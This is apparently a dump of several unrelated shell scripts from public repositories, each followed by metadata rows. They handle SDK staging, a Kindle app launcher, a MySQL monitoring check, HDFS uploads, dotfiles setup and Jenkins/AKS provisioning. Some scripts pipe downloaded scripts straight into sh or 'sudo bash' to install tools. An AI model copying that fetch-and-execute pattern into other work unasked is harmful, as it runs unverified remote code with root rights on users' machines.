rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib_STAGING"
cd "${FLEKSYSDK_COMPILED_STAGE_DIR}/ios/lib"
for FLEKSYSDK_COMPILED_LIB in lib*.a
do
echo "Stripping debug symbols from iOS lib : '${FLEKSYSDK_COMPILED_LIB}'..."
/usr/bin/strip -S "${FLEKSYSDK_COMPILED_LIB}" 2>&1 | perl -e 'while(<>) { s/^\/usr\/bin\/strip: input object file stripped: (.*?)libFleksyStatic\.a\(FLFile\.o\) \(for architecture [^\)]+\)\n$//; print $_; }'
echo "Verifing expected architectures in iOS lib: '${FLEKSYSDK_COMPILED_LIB}'..."
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch i386
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch armv7
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch armv7s
done
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo ""
echo "Staging OSX..."
rsync -a --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/osx/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib" "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib_STAGING"
mv "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib_STAGING/Release" "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib_STAGING"
cd "${FLEKSYSDK_COMPILED_STAGE_DIR}/osx/lib"
for FLEKSYSDK_COMPILED_LIB in *.dylib
do
echo "Stripping debug symbols from OSX lib : '${FLEKSYSDK_COMPILED_LIB}'..."
/usr/bin/strip -S "${FLEKSYSDK_COMPILED_LIB}"
echo "Verifing expected architectures in OSX lib: '${FLEKSYSDK_COMPILED_LIB}'..."
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch i386
lipo "${FLEKSYSDK_COMPILED_LIB}" -verify_arch x86_64
done
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo ""
echo "Staging samples..."
mkdir -p "${FLEKSYSDK_COMPILED_STAGE_DIR}/samples"
rsync -a --exclude-from="${FLEKSYSDK_COMPILED_SCRIPTS_DIR}/rsyncIgnore" --delete "${FLEKSYSDK_COMPILED_ROOT_DIR}/samples/" "${FLEKSYSDK_COMPILED_STAGE_DIR}/samples/"
rm -rf "${FLEKSYSDK_COMPILED_STAGE_DIR}/samples/NOKIA-FleksySample2.zip"
echo ""
echo "Creating FleksySDK archive..."
mv "${FLEKSYSDK_COMPILED_BUILD_DIR}/stage" "${FLEKSYSDK_COMPILED_BUILD_DIR}/FleksySDK"
cd "${FLEKSYSDK_COMPILED_BUILD_DIR}"
/usr/bin/tar czf FleksySDK.tar.gz FleksySDK
cd "${FLEKSYSDK_COMPILED_ROOT_DIR}"
echo ""
echo "Finished!"
echo ""
echo "FleksySDK archive: 'build/FleksySDK.tar.gz'"
| true
|
9ab05c1d2c25cc2c309c610cdf334f0a31b3d56e
|
Shell
|
GBert/railroad
|
/mrsystem/src/client_gpios88/startmrgpios88
|
UTF-8
| 412
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
# Start the mrgpios88 (GPIO S88 feedback bus) daemon with parameters taken
# from the mrsystem configuration files.

GPIO_S88_KEY=gpio_s88
GPIO_S88_START_KEY=startmrgpios88
MRSYSTEM_CFG_FILE=/etc/mrsystem
MRSTART_CFG_FILE=/etc/mrstart

# Daemon parameters: quoted value of the 'gpio_s88' entry in /etc/mrsystem.
GPIO_S88_PARAM=`fgrep $GPIO_S88_KEY $MRSYSTEM_CFG_FILE | cut -f 2 -d "\""`
# Start flag: quoted value of the 'startmrgpios88' entry in /etc/mrstart.
# Fixed: the file variable was referenced without '$', so fgrep looked for a
# literal file named 'MRSTART_CFG_FILE' and the flag was always empty.
GPIO_S88_START=`fgrep $GPIO_S88_START_KEY $MRSTART_CFG_FILE | cut -f 2 -d "\""`

# Fixed: the original comparison had an unbalanced quote (= xstop") which made
# the whole script a syntax error.
# NOTE(review): starting the daemon when the flag equals "stop" looks inverted;
# confirm the intended flag value against the companion mrsystem start scripts.
if [ "x$GPIO_S88_START" = "xstop" ] ; then
   start-stop-daemon --start --background --exec /usr/local/bin/mrgpios88 -- $GPIO_S88_PARAM
fi
| true
|
415ed3b1b9bcbdbceeb3b72418ef4da47a49c20b
|
Shell
|
gemlongman/MyNote
|
/sh/run-models.sh
|
UTF-8
| 2,896
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/gy/usr/Linux/64/gcc7/lib
MODEL_FOLD=./models
# /home/gy/share/workfile/shapnet/ShapeNetSemv0
# ./models
BIN=./scan_prediction
ICP_DIR=./shn_icp
SPHERE=./sphere-coarse.binary.obj
ReportFile=./report.txt
LOG_FILE=log.txt
OBJ=$1
function sum(){
input=($*)
summary=0.0
# echo "${input[*]}"
for i in ${input[*]} ; do
# echo "i==${i}"
summary=$(echo "$summary+$i"|bc)
done
echo $summary
# return summary
}
if [ ! -z "$1" ]; then
rm -rf $OBJ
mkdir $OBJ
LOG_FILE=$OBJ/log.txt
date 2>&1 | tee $LOG_FILE
printf '***** start to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOG_FILE
$BIN icp_dir=$ICP_DIR stddev=0 angle_thd=0.4 normal_method=3 weight_method=3 predict_method=9 noise=0 obj=$MODEL_FOLD/$OBJ.norm.binary.obj sphere=$SPHERE itr=50 prefix=$OBJ/$OBJ. 2>&1 | tee -a $LOG_FILE
printf '***** finish to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOF_FILE
date 2>&1 | tee -a $LOG_FILE
exit
fi
# rm -rf ./Output
echo "" > $ReportFile
for d in $MODEL_FOLD/*.obj ; do
OBJfile=$d
# echo "OBJfile:$OBJfile"
OBJ=$(echo ${OBJfile##*/})
OBJ=$(echo ${OBJ%%.*})
# echo "file:$OBJ"
nMethod=3
wMethod=3
pMethod=9
Noise=0.1
OBJ_dir=Output/$OBJ$nMethod$wMethod$pMethod$Noise
LOG_FILE=$OBJ_dir/log.txt
mkdir -p $OBJ_dir
StartTime=$(date +%s.%N)
# date 2>&1 | tee $LOG_FILE
# printf '***** start to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOG_FILE
# #prefix : belong output file
# $BIN icp_dir=$ICP_DIR stddev=0 normal_method=$nMethod weight_method=3 predict_method=$pMethod noise=$Noise obj=$OBJfile sphere=$SPHERE itr=50 prefix=$OBJ_dir/$OBJ. 2>&1 | tee -a $LOG_FILE
# printf '***** finish to run model: %s\n\n' $OBJ 2>&1 | tee -a $LOF_FILE
# date 2>&1 | tee -a $LOG_FILE
Endtime=$(date +%s.%N)
start_s=$(echo $StartTime | cut -d '.' -f 1)
start_ns=$(echo $StartTime | cut -d '.' -f 2)
end_s=$(echo $Endtime | cut -d '.' -f 1)
end_ns=$(echo $Endtime | cut -d '.' -f 2)
time=$(( ( 10#$end_s - 10#$start_s ) * 1000 + ( 10#$end_ns / 1000000 - 10#$start_ns / 1000000 ) ))
iterations=` grep "Terminate at iteration:" $LOG_FILE`
iterations=${iterations##*"Terminate at iteration: "}
coverateRate=` grep "coverate rate" $LOG_FILE | grep -Eo '[01].?[0-9]*'`
ARRcoverateRate=($coverateRate)
# iterations == exper ${#ARRcoverateRate[@]} - 1
lastcoverateRate=${ARRcoverateRate[${iterations}]}
predictionCost=` grep "prediction cost:" $LOG_FILE | grep -Eo '[0-9]+\.[0-9]*' `
predictionCost=$(sum "$predictionCost")
printf "$OBJ $nMethod $wMethod $pMethod $Noise \t iterations $iterations \t coverateRate ${lastcoverateRate} \t predictionCost $predictionCost\t $time ms \n" >> $ReportFile
done
| true
|
2abf3bd481771aa3b601034ba60af3b2cf18d110
|
Shell
|
jiedo/coolreader-kindle-qt
|
/dist-kt/cr3/cr3.sh
|
UTF-8
| 1,239
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/sh
# Launch a Qt application (e.g. CoolReader) on a Kindle Touch: hides the
# native UI, sets up the embedded-Qt environment, runs the app, then restores
# the stock home screen on exit.
# Usage: cr3.sh <executable_file_name>

if [ -z "$1" ] # No argument passed?
then
echo "Usage: qoqt.sh 'executable_file_name'" ;
# Fixed: 'return' is only valid inside a function or a sourced script; when
# this script is executed directly it must 'exit' instead.
exit 1
fi
SAVE_DIR=`pwd`
cd /mnt/us/cr3
if [ ! -f "$1" ] # Check if file exists and it is a regular one
then
echo "goqt: "$1" -- regular file does not exist." ;
exit 1
fi
if [ ! -x "$1" ]
then
echo "goqt: "$1" -- not an executable file." ;
exit 1
fi
# If the app is already running, wake it up instead of starting a second copy.
# (Quoted pidof output so the test is well-formed even when nothing matches.)
if [ -n "`pidof $1`" ]
then
echo "goqt: "$1" -- already running." ;
# wake up, Neo
kill -SIGUSR1 `pidof $1`
exit 0
fi
export LD_LIBRARY_PATH=/mnt/us/qtKindle/lib:`pwd`/lib
source /etc/upstart/functions
source /etc/upstart/blanket_functions
# Swap the ad screensaver modules for the plain screensaver while running.
f_blanket_unload_module ad_screensaver
f_blanket_unload_module ad_screensaver_active
f_blanket_load_module screensaver
# hide Xorg windows
./ktsuspend.sh 0
export QT_PLUGIN_PATH=/mnt/us/qtKindle/plugins
export QT_QWS_FONTDIR=/mnt/us/qtKindle/lib/fonts
export QWS_MOUSE_PROTO=KindleTS
export QWS_KEYBOARD=none
export QWS_DISPLAY=QKindleFb
echo "./$1 -qws"
./"$1" -qws
cd $SAVE_DIR
# return to home, comment for returning back to runner if you have other commands there
lipc-set-prop com.lab126.appmgrd start app://com.lab126.booklet.home
# restore Xorg windows
killall -CONT awesome
./ktresume.sh 0
| true
|
485da22197d9d2c029c20619369a1ab12b7c64b0
|
Shell
|
mionsan/Centos
|
/linux/zabbix/chk_innodb.sh
|
UTF-8
| 1,211
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
# Zabbix user-parameter helper reporting MySQL InnoDB buffer-pool metrics.
# Usage: chk_innodb.sh {total|used|%used|hitrate}
# Fixed: the shebang was '#1/bin/bash' (typo), so the script ran under the
# caller's default shell instead of bash.
case $1 in
total)
# Buffer pool size in bytes (total pages * page size).
echo "SELECT (PagesTotal*PageSize) DataMB FROM (SELECT variable_value PagesTotal FROM information_schema.global_status WHERE variable_name='INNODB_BUFFER_POOL_PAGES_TOTAL') A, (SELECT variable_value PageSize FROM information_schema.global_status WHERE variable_name='Innodb_page_size') B;" | HOME=/var/lib/zabbix mysql -N
;;
used)
# Bytes of the buffer pool currently holding data pages.
echo "SELECT (PagesData*PageSize) DataMB FROM (SELECT variable_value PagesData FROM information_schema.global_status WHERE variable_name='INNODB_BUFFER_POOL_PAGES_DATA') A, (SELECT variable_value PageSize FROM information_schema.global_status WHERE variable_name='Innodb_page_size') B;" | HOME=/var/lib/zabbix mysql -N
;;
%used)
# Percentage of buffer-pool pages holding data.
echo "SELECT (PagesData*100)/PagesTotal FROM (SELECT variable_value PagesData FROM information_schema.global_status WHERE variable_name='Innodb_buffer_pool_pages_data') A, (SELECT variable_value PagesTotal FROM information_schema.global_status WHERE variable_name='Innodb_buffer_pool_pages_total') B;" | HOME=/var/lib/zabbix mysql -N
;;
hitrate)
# Field 5 of the "Buffer pool hit rate N / 1000" line; divide by 10 to
# report the hit rate as a percentage.
x=`echo "show engine innodb status\G;" | HOME=/var/lib/zabbix mysql -N | grep "Buffer pool hit rate" | awk '{print $5}'`
hit=$(echo $x/10 | bc)
echo $hit
esac
| true
|
9e00992e00d7f71c9afa1bda16614a42d7714da0
|
Shell
|
frankielivada22/Rchat
|
/Rchat/StartChatServer/startserver.sh
|
UTF-8
| 2,765
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
# Colours
lgreen="\e[92m"
lred="\e[91m"
nc="\e[39m"
lyellow="\e[1;33m"
issslon=0
function exitprogram()
{
# This function exits the scripts using the trap command
echo ""
echo -e $lgreen"Aight bet..."
echo -e $lred"cya soon XD"
exit 0
}
function checkroot()
{
# This function checks to see if the user is root or running script as root and if not it closes
if [ $(id -u) != "0" ]; then
echo ""
echo You need to be root to run this script...
echo Please start R.Deauth with [sudo ./start.sh]
exit
else
echo YAY your root user!
sleep 1
clear
fi
}
function netcatinstalled()
{
	# Ensure nmap and ncat are installed, offering to install whichever is
	# missing; exits if the user declines, since both tools are required.
	nmaptool=`which nmap`
	if [[ "$?" != "0" ]]; then
		echo -e $lred"Nmap not found need to install..."
		echo -e $lgreen""
		read -p "Would you like to install Nmap? (y / n): " installnmap
		if [[ $installnmap == "y" ]]; then
			echo "Installing nmap"
			sudo apt-get update
			sudo apt-get upgrade
			# Fixed: 'apt-get nmap' is not a valid apt-get invocation —
			# the 'install' action was missing, so nothing was installed.
			sudo apt-get -y install nmap
		fi
		if [[ $installnmap == "n" ]]; then
			echo -e $lgreen"You need nmap..."
			exit 0
		fi
	fi

	ncattool=`which ncat`
	if [[ "$?" != "0" ]]; then
		echo -e $lred"Ncat not found need to install..."
		echo -e $lgreen""
		read -p "Would you like to install Ncat? (y / n): " installncat
		if [[ $installncat == "y" ]]; then
			echo "Installing ncat"
			sudo apt-get update
			sudo apt-get upgrade
			# Fixed: missing 'install' action here as well.
			sudo apt-get -y install ncat
		fi
		# Fixed: this branch tested $installnmap (copy-paste bug), so
		# answering 'n' for Ncat never aborted the script.
		if [[ $installncat == "n" ]]; then
			echo -e $lgreen"You need Ncat..."
			exit 0
		fi
	fi
}
#Running 3 of the functions
trap exitprogram EXIT
checkroot
netcatinstalled
while :
do
# The main menu
clear
echo -e $lgreen"Welcome..."
echo "encryption=$issslon"
echo "1) Start $chattype chat"
echo ""
echo "2) Enable/Disable encryption"
echo ""
echo "e) Exit"
echo ""
read -p "-->> " menu1
if [[ $menu1 == "1" ]]; then
if [[ $issslon == "1" ]]; then # Checks to see if encryption needs to be enabled
while :
do
echo ""
echo -e $lgreen"Chat started: "
ncat -v -p 8888 --listen --ssl --broker -k #runs script with ssl encryption enabled
echo -e $lred"something went wrong..."
echo "restarting"
done
fi
if [[ $issslon == "0" ]]; then
while :
do
echo ""
echo -e $lgreen"Chat started: "
ncat -k -l -p 8888 --broker #runs script with ssl encryption disabled
echo -e $lred"something went wrong..."
echo "restarting"
done
fi
fi
if [[ $menu1 == "2" ]]; then
if [[ $issslon == "0" ]]; then # Enables encryption
echo "Enableing encryption..."
issslon=1
sleep 2
else # Disables encryption
echo "Disableing encryption..."
issslon=0
sleep 2
fi
fi
if [[ $menu1 == "e" ]]; then # Exits script
exit 0
fi
done
| true
|
e554940d12e33093eaa8de1170dba09561b75fc5
|
Shell
|
crttcr/working-examples
|
/git/checkout.sh
|
UTF-8
| 206
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
## [Merge]
##
## Checkout the version of "file.a" from either
## the current branch (ours) or the branch being
## merged into the current branch (theirs)
##
# NOTE(review): '--{ours,theirs}' is illustrative shorthand — if executed
# literally, bash brace expansion passes BOTH flags at once. Run with exactly
# one of '--ours' or '--theirs' in practice.
git checkout --{ours,theirs} file.a
| true
|
3781f62dd5b7efbd6e2c3dbf9cf5c59cf6d5a803
|
Shell
|
rainly/scripts-1
|
/behavior2hdfs.sh
|
UTF-8
| 1,255
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
## location: 10,dest=/data/crontab,owner=weiguo:sysadmin,mode=755
#dump all online logs to hdfs
# Import the behavior logs into HDFS.
## 2015-08-04
## The logs are now stored on node 10.1.1.60 in real time, so this script is
## only used to check whether the data already exists in HDFS.
HDFS_BASEDIR="/backup/behaviour"
LOCAL_BASEDIR="/logs/bi_exp"
# Target day: yesterday by default, or the date given as $1.
if [ -z $1 ];then
CURR_DAY=$(date -d "1 days ago" +"%Y-%m-%d")
else
CURR_DAY=$(date -d "$1" +"%Y-%m-%d")
fi
# Exit 0 if the day's directory already exists in HDFS, 1 otherwise.
hdfs dfs -test -d /backup/behaviour/app_action/$CURR_DAY
if [ $? -eq 0 ];then
echo "data has exists"
exit 0
else
echo "data has not exists"
exit 1
fi
# NOTE(review): both branches above exit, so everything below is unreachable —
# it is the original compress-and-upload workflow, kept for reference.
cd $LOCAL_BASEDIR/$CURR_DAY || exit 1
#first compress all log file
lzop -U *.log
#rsync -av rsync://211.151.151.237/behaviour/\*.${CURR_DAY}.lzo $LOGS_DIR/ 2>/tmp/rsync_behaviour.log
#rsync -av /tmp/2014-07-09/*.${CURR_DAY}.gz $LOGS_DIR/ 2>/tmp/rsync_behaviour.log
for f in *.lzo
do
#break filename into 4 parts ,filename is such as app_action-info-211.151.151.237.log.lzo
method=$(echo $f |cut -d- -f1)
hdfsdir=${HDFS_BASEDIR}/${method}/${CURR_DAY}
hdfs dfs -mkdir -p ${hdfsdir}
hdfs dfs -moveFromLocal $f ${hdfsdir}/
#hadoop jar /usr/lib/hadoop/lib/hadoop-lzo-0.6.0.jar com.hadoop.compression.lzo.LzoIndexer ${hdfsdir}/
done
| true
|
857521b064f32201c3f4eecaa91a768f861e2421
|
Shell
|
andyuk/animation-tests
|
/www/images/gen.sh
|
UTF-8
| 292
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
# Generate 100 numbered placeholder PNGs with ImageMagick, e.g.:
#   sh gen.sh 100x100 100
#   sh gen.sh 400x400 400
#   sh gen.sh 768x768 768
#   sh gen.sh 1024x768 1024
#
# $1 - geometry (WxH) of each image
# $2 - output directory (must already exist)
dimensions=$1
outputDir=$2
for i in {1..100}; do
  # Bug fix: the convert invocation was wrapped in backticks, which executed
  # convert's (empty) output as a command; run it directly, and quote the
  # expansions so geometries/paths survive word splitting.
  convert -size "$dimensions" -gravity center -background lightblue \
    -fill black -pointsize 72 "label:$i" "$outputDir/test$i.png"
done
| true
|
f33fa1b1aaab87c5428ead04ba3d49ca818e5e02
|
Shell
|
oznogon/bygfoot
|
/bfscript/trunk/bfgetpot
|
UTF-8
| 216
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# Regenerate the bygfoot gettext template (po/bygfoot.pot) and update/compile
# every translation catalogue against it.
. scripts.cfg   # sourced for $bygfoot_source (defined in scripts.cfg)
pushd $bygfoot_source
# Extract translatable strings (marked with _()) from the files listed in
# po/POTFILES.in into a fresh template.
xgettext -c -d bygfoot -k_ --force-po -f po/POTFILES.in
mv bygfoot.po po/bygfoot.pot
pushd po
for i in *po; do
# Merge new template strings into each catalogue, then compile with checks.
msgmerge -s -U $i bygfoot.pot
msgfmt -c $i
done
| true
|
54545978ba5cdded0d17b3cfd1974273ebec6fc3
|
Shell
|
jacoborus/dotfiles
|
/bootstrap.sh
|
UTF-8
| 4,056
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
# Dotfiles bootstrap: backs up existing configuration, symlinks this repo's
# files into place, and optionally installs editor/shell tooling (see main()).

# list of files to symlink and backup in homedir
FILES=".bashrc .tmux.conf .zshrc"
# list of files to backup in vim directory
VIMFILES="init.vim coc-settings.json general.vim plugin.vim plug.vim status.vim"
# list of files to symlink in vim directory
VIMINITFILES="plug.vim general.vim plugins.vim status.vim"
DOTDIR=$(readlink -f $(dirname "$0")) # dotfiles directory (readlink -f is GNU-specific)
TODAY="$(date +%Y-%m-%d_%H-%M-%S)"    # timestamp keeps each backup run separate
BACKUPFOLDER="$HOME/dotfiles_old/$TODAY"
VIMDIR="$HOME/.config/nvim"
THEMESFOLDER=$HOME/.oh-my-zsh/themes
# Succeed (status 0) when every named command can be resolved by the shell,
# fail otherwise. Output of the lookup itself is discarded.
command_exists() {
  if command -v "$@" > /dev/null 2>&1; then
    return 0
  else
    return 1
  fi
}
# Move "$1/$2" into the session backup folder ($BACKUPFOLDER), creating the
# folder on demand; a missing source file is a silent success (no-op).
# Globals:   BACKUPFOLDER (read)
# Arguments: $1 - directory containing the file, $2 - file name
function createBackup() {
  local ORIGIN="$1/$2"
  if [ -e "$ORIGIN" ]; then
    local DESTINATION="$BACKUPFOLDER/$2"
    echo "'$ORIGIN' => '$DESTINATION'"
    mkdir -p "$BACKUPFOLDER"
    mv "$ORIGIN" "$DESTINATION"
    # Bug fix: this used to run '[ -e ... ] && rm -y ...' — rm has no -y
    # option, and the trailing && made the function return 1 on the normal
    # success path (after mv the source no longer exists).
    if [ -e "$ORIGIN" ]; then
      rm -rf -- "$ORIGIN"
    fi
  fi
}
# Create a symlink to "$2/$1" at destination $3 (verbose output).
# Arguments: $1 - file name, $2 - directory containing it,
#            $3 - destination (target directory or link path)
function createSymlink() {
  local ORIGIN="$2/$1"
  local DESTINATION="$3"
  # Bug fix: quote the expansions so paths containing spaces survive
  # word splitting (DOTDIR/HOME may contain spaces).
  ln -s -v "$ORIGIN" "$DESTINATION"
}
# Download the vim-plug plugin manager into NeoVim's autoload directory
# (requires curl and network access).
function installVimplug() {
  echo -e "\e[34mInstalling vim-plug\e[0m"
  # $HOME is expanded by the inner sh (single quotes defer expansion).
  sh -c 'curl -fLo $HOME/.config/nvim/site/autoload/plug.vim --create-dirs \
https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim' &&
    echo 'vim-plug ok'
}
# Install the Oh My Zsh framework via its official installer script
# (downloads and executes remote code; requires network access).
function installOhMyZsh() {
  echo -e "\e[34mInstalling ZSH plugin manager (OhMyZsh)...\e[0m"
  sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" &&
    echo 'ok'
}
# Back up existing dotfiles into $BACKUPFOLDER, symlink this repo's files
# into place, and generate an init.vim that sources the repo's vim configs.
# Globals: FILES, VIMFILES, VIMINITFILES, DOTDIR, VIMDIR, THEMESFOLDER,
#          BACKUPFOLDER (all read)
function installDotfiles() {
  # Move old files to backup folder
  echo -e "\e[34mMoving old files to backup folder...\e[0m"
  for file in $FILES; do
    createBackup $HOME $file
  done
  for file in $VIMFILES; do
    createBackup $VIMDIR $file
  done
  createBackup $THEMESFOLDER adesis.zsh-theme
  createBackup $THEMESFOLDER rush.zsh-theme
  # Create sylinks
  echo -e "\e[34mCreating symlinks...\e[0m"
  createSymlink '.bashrc' $DOTDIR/sh $HOME
  createSymlink '.zshrc' $DOTDIR/sh $HOME
  createSymlink '.tmux.conf' $DOTDIR/tmux $HOME
  createSymlink 'adesis.zsh-theme' $DOTDIR/sh $THEMESFOLDER
  createSymlink 'rush.zsh-theme' $DOTDIR/sh $THEMESFOLDER
  mkdir -p $VIMDIR
  createSymlink 'coc-settings.json' $DOTDIR/vim $VIMDIR
  # Generate an init.vim file that sources each fragment from the repo.
  echo -e "\e[34mCreating init.vim file...\e[0m"
  local INITVIM=""
  for file in $VIMINITFILES; do
    INITVIM="$INITVIM\nso $DOTDIR/vim/$file"
  done
  echo -e "$INITVIM" >$VIMDIR/init.vim
}
# Install the baseline CLI tooling with whichever package manager is present
# (apt or dnf), then exit the script; aborts when neither is available.
#
# Bug fix: the original package lists had missing backslash continuations, so
# the apt branch stopped installing at 'xsel' and then executed 'zsh exit' as
# a command, and the dnf branch stopped at 'gpick' and then tried to run
# 'inkscape jq luarocks meld ...' as a command.
function installBasicSoftware() {
  echo -e "\e[34mInstalling basic software\e[0m"
  if command_exists apt; then
    echo "apt found! installing basic software"
    sudo apt install \
      git-extras gpick inkscape jq luarocks meld neovim \
      p7zip-full ripgrep saidar silversearcher-ag tmux tree \
      whois xclip xsel zsh
    exit
  elif command_exists dnf; then
    echo "dnf found! installing basic software"
    sudo dnf install \
      ag git-extras gpick inkscape jq luarocks meld neovim \
      ripgrep saidar tmux tree whois xclip xsel zsh
    exit
  else
    echo -e "\e[34mno apt or dnf found. Aborting...\e[0m"
    exit
  fi
}
# Interactive multi-select menu: number keys toggle entries (shown with a
# highlighted '+'), ENTER runs the selected installers in fixed order.
function main() {
  clear -x
  local options=(
    "Install NeoVim plugin manager (vim-plug)"
    "Install ZSH plugin manager (OhMyZsh)"
    "Install Dotfiles"
    "Install basic software"
  )
  # Redraw the menu; entries present in choices[] are highlighted.
  menu() {
    echo "What do you want to do?"
    for i in ${!options[@]}; do
      local label=" $((i + 1))) ${options[i]}"
      [ "${choices[i]}" ] && echo -e "\e[46m\e[30m+$label\e[0m" || echo -e " $label"
    done
    [[ "$msg" ]] && echo "$msg"
    :
  }
  prompt="Check an option (again to uncheck, ENTER when done): "
  # Read one key at a time; a digit toggles the matching entry, ENTER ends.
  while menu && read -s -n 1 -rp "$prompt" num && [[ "$num" ]]; do
    [[ "$num" != *[![:digit:]]* ]] &&
      ((num > 0 && num <= ${#options[@]})) ||
      {
        msg="Invalid option: $num"
        clear -x
        continue
      }
    ((num--))
    msg=""
    [[ "${choices[num]}" ]] && choices[num]="" || choices[num]="+"
    clear -x
  done
  echo ""
  # Execute the selected actions (list order, not selection order).
  [ -n "${choices[0]}" ] && installVimplug
  [ -n "${choices[1]}" ] && installOhMyZsh
  [ -n "${choices[2]}" ] && installDotfiles
  [ -n "${choices[3]}" ] && installBasicSoftware
}
main
| true
|
27020342612f6e850ddcd167ebffffcbeee0d385
|
Shell
|
Humm3r/azure-devops-utils
|
/quickstart_template/301-jenkins-k8s-blue-green.sh
|
UTF-8
| 4,893
| 3.953125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Print the CLI usage/help text to stdout (heredoc content is emitted verbatim,
# with $0 expanded to the script name).
function print_usage() {
  cat <<EOF
https://github.com/Azure/azure-quickstart-templates/tree/master/301-jenkins-k8s-blue-green
Command
$0
Arguments
--app_id|-ai [Required] : Service principal app id used to dynamically manage resource in your subscription
--app_key|-ak [Required] : Service principal app key used to dynamically manage resource in your subscription
--subscription_id|-si [Required] : Subscription Id
--tenant_id|-ti [Required] : Tenant Id
--resource_group|-rg [Required] : Resource group containing your Kubernetes cluster
--aks_name|-an [Required] : Name of the Azure Kubernetes Service
--jenkins_fqdn|-jf [Required] : Jenkins FQDN
--artifacts_location|-al : Url used to reference other scripts/artifacts.
--sas_token|-st : A sas token needed if the artifacts location is private.
EOF
}
# Abort the whole script (usage on stderr/stdout, exit status 255 via -1)
# when a required argument value is empty; return 0 otherwise.
# Arguments: $1 - parameter name (used in the error message), $2 - its value
function throw_if_empty() {
  local arg_name="$1"
  local arg_value="$2"
  [ -n "$arg_value" ] && return 0
  echo "Parameter '$arg_name' cannot be empty." 1>&2
  print_usage
  exit -1
}
# Fetch a helper script from $artifacts_location and execute it under sudo,
# forwarding all remaining arguments; aborts this script if the helper fails.
# Globals: artifacts_location, artifacts_location_sas_token (read)
# NOTE(review): piping curl straight into 'sudo bash' fully trusts the
# artifacts location — ensure it points at a trusted source.
function run_util_script() {
  local script_path="$1"
  shift
  curl --silent "${artifacts_location}${script_path}${artifacts_location_sas_token}" | sudo bash -s -- "$@"
  local return_value=$?
  if [ $return_value -ne 0 ]; then
    >&2 echo "Failed while executing script '$script_path'."
    exit $return_value
  fi
}
# Install the latest stable kubectl into /usr/local/bin unless one is already
# on the PATH (network access and sudo required).
function install_kubectl() {
  if !(command -v kubectl >/dev/null); then
    kubectl_file="/usr/local/bin/kubectl"
    sudo curl -L -s -o $kubectl_file https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
    sudo chmod +x $kubectl_file
  fi
}
# Install the Azure CLI from Microsoft's apt repository unless 'az' is
# already on the PATH (Debian/Ubuntu only; network access and sudo required).
function install_az() {
  if !(command -v az >/dev/null); then
    sudo apt-get update && sudo apt-get install -y libssl-dev libffi-dev python-dev
    echo "deb [arch=amd64] https://apt-mo.trafficmanager.net/repos/azure-cli/ wheezy main" | sudo tee /etc/apt/sources.list.d/azure-cli.list
    sudo apt-key adv --keyserver apt-mo.trafficmanager.net --recv-keys 417A0893
    sudo apt-get install -y apt-transport-https
    sudo apt-get -y update && sudo apt-get install -y azure-cli
  fi
}
# Default location for helper scripts; override with --artifacts_location.
artifacts_location="https://raw.githubusercontent.com/Azure/azure-devops-utils/master/"

# Parse command-line options (see print_usage above for their meaning).
# NOTE(review): '[[ $# > 0 ]]' is a lexicographic string comparison; it
# behaves like -gt for realistic argument counts, but -gt is the correct test.
while [[ $# > 0 ]]
do
key="$1"
shift
case "$key" in
--app_id|-ai)
app_id="$1"
shift
;;
--app_key|-ak)
app_key="$1"
shift
;;
--subscription_id|-si)
subscription_id="$1"
shift
;;
--tenant_id|-ti)
tenant_id="$1"
shift
;;
--resource_group|-rg)
resource_group="$1"
shift
;;
--aks_name|-an)
aks_name="$1"
shift
;;
--jenkins_fqdn|-jf)
jenkins_fqdn="$1"
shift
;;
--artifacts_location|-al)
artifacts_location="$1"
shift
;;
--sas_token|-st)
artifacts_location_sas_token="$1"
shift
;;
--help|-help|-h)
print_usage
exit 13
;;
*)
echo "ERROR: Unknown argument '$key' to script '$0'" 1>&2
exit -1
esac
done

# Every one of these arguments is mandatory; abort with usage if any is empty.
throw_if_empty --app_id "$app_id"
throw_if_empty --app_key "$app_key"
throw_if_empty --subscription_id "$subscription_id"
throw_if_empty --tenant_id "$tenant_id"
throw_if_empty --resource_group "$resource_group"
throw_if_empty --aks_name "$aks_name"
throw_if_empty --jenkins_fqdn "$jenkins_fqdn"

install_kubectl
install_az
sudo apt-get install --yes jq

#install jenkins
run_util_script "jenkins/install_jenkins.sh" \
--jenkins_release_type verified \
--jenkins_version_location "${artifacts_location}jenkins/blue-green/verified-jenkins-version${artifacts_location_sas_token}" \
--jenkins_fqdn "${jenkins_fqdn}" \
--artifacts_location "${artifacts_location}" \
--sas_token "${artifacts_location_sas_token}"

# Bootstrap the AKS cluster for blue/green deployments.
